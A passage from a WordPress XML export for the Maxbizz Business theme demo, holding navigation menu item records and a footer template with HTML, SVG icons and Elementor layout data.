		<wp:menu_order>14</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1557]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog List</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/blog-list/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/blog-list/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1561</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-list]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>26</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1547]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog Post</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/blog-post/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/blog-post/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1562</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-post]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>27</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1547]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[430]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Details</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio-details/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/portfolio-details/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1563</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-details]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>17</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1557]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[837]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[ot_portfolio]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home-2/</link>
		<pubDate>Wed, 09 Dec 2020 09:10:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/?p=1874</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1874</wp:post_id>
		<wp:post_date><![CDATA[2020-12-09 09:10:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-09 09:10:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[home-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>1</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1023]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_footer_builders/footer-2/</link>
		<pubDate>Wed, 16 Dec 2020 10:01:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/?post_type=ot_footer_builders&#038;p=1921</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz Business">
				</a>			        
		<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.</p>		
					<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Linkedin-in
											</a>
			<h6>About us</h6>		
					<ul>
							<li>
					<a href="#">					Contact us 
											</a>
									</li>
								<li>
					<a href="#">					Connect
											</a>
									</li>
								<li>
					<a href="#">					Subscribe
											</a>
									</li>
								<li>
					<a href="#">					Terms of use 
											</a>
									</li>
								<li>
					<a href="#">					Sitemap
											</a>
									</li>
						</ul>
					<ul>
							<li>
					<a href="#">					Careers
											</a>
									</li>
								<li>
					<a href="#">					Newsroom
											</a>
									</li>
								<li>
					<a href="#">					Case Studies
											</a>
									</li>
								<li>
					<a href="#">					Disclosures 
											</a>
									</li>
								<li>
					<a href="#">					Services
											</a>
									</li>
						</ul>
			<h6>Contacts</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
			<h6>Subscribe</h6>		
		<p>Subscribe to our newsletter. Be always in trend!</p><p>Copyright © 2020 Maxbizz by OceanThemes. All Rights Reserved.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1921</wp:post_id>
		<wp:post_date><![CDATA[2020-12-16 10:01:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-16 10:01:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_footer_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4f1eb3a","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#1E1E1E","padding":{"unit":"px","top":"190","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"496a621","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"a833355","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":1933},"_margin":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"03a8e7c","elType":"widget","settings":{"editor":"<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.<\/p>","text_color":"#C0C1C2","typography_typography":"custom","typography_line_height":{"unit":"px","size":30,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"111c297","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-linkedin-in","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.90000000000000002220446049250313080847263336181640625,"sizes":[]},"icon_spacing":{"unit":"px","size":14,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_primary_color":"#4B83FC","icon_secondary_color":"#FFFFFF","icon_primary_color":"#24262F","columns":"3"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"bf80d75","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"ecdb5e8","elType":"widget","settings":{"title":"About us","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"204a7ee","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20"},"elements":[{"id":"c279681","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"12","left":"0","isLinked":false}},"elements":[{"id":"99bc8ef","elType":"widget","settings":{"icon_list":[{"text":"Contact us ","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Connect","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Subscribe","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Terms of use ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Sitemap","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#D92300","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"6637d67","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50},"elements":[{"id":"14c17dd","elType":"widget","settings":{"icon_list":[{"text":"Careers","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Newsroom","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Case Studies","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Disclosures ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Services","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#D92300","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"4ec40e7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"090036a","elType":"widget","settings":{"title":"Contacts","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2fbe26d","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"6336da8","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":21,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"2cdf64c","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"}],"isInner":false},{"id":"e60dbf5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3967a1e","elType":"widget","settings":{"title":"Subscribe","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5f30bf0","elType":"widget","settings":{"wp":{"title":""},"_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-mc4wp_form_widget"},{"id":"9ee11df","elType":"widget","settings":{"editor":"<p>Subscribe to our newsletter. Be always in trend!<\/p>","text_color":"#C0C1C2"},"elements":[],"widgetType":"text-editor"}],"isInner":false}],"isInner":false},{"id":"a1a6629","elType":"section","settings":{"background_background":"classic","background_color":"#1E1E1E"},"elements":[{"id":"a55ddc1","elType":"column","settings":{"_column_size":100,"_inline_size":null,"border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a2295d4","elType":"section","settings":{"layout":"full_width","border_border":"solid","border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false},"border_color":"rgba(255, 255, 255, 0.1)","padding":{"unit":"px","top":"25","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[{"id":"e3fe55c","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"87c0818","elType":"widget","settings":{"editor":"<p>Copyright \u00a9 2020 Maxbizz by OceanThemes. All Rights Reserved.<\/p>","align":"center","text_color":"#929399","typography_typography":"custom","typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
